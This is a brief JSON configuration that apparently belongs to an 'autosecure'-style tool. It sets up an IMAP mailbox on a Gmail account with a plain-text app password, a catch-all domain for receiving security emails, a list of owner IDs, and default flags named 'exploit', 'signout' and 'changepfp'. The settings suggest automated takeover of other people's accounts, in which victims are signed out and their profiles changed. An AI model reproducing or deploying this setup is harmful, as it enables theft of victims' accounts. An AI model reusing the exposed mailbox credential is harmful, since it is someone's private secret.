{
  "email": {
    "host": "imap.gmail.com",
    "port": 993,
    "user": "autosecure231@gmail.com",
    "password": "tptk ftbt qnzw nnqc",
    "checkInterval": 30,
    "domain": "inbox.auto-secure.lol",
    "useCatchAll": true,
    "type": "security_emails_only"
  },
  "domains": ["inbox.auto-secure.lol"],
  "owners": [
    "gift_link_user",
    "691361579417075846589755051895947264",
    "589755051895947264",
    "925359883715498084"
  ],
  "defaultSettings": {
    "addzyger": 1,
    "changepfp": 0,
    "secureifnomc": 0,
    "exploit": 1,
    "signout": 1
  }
}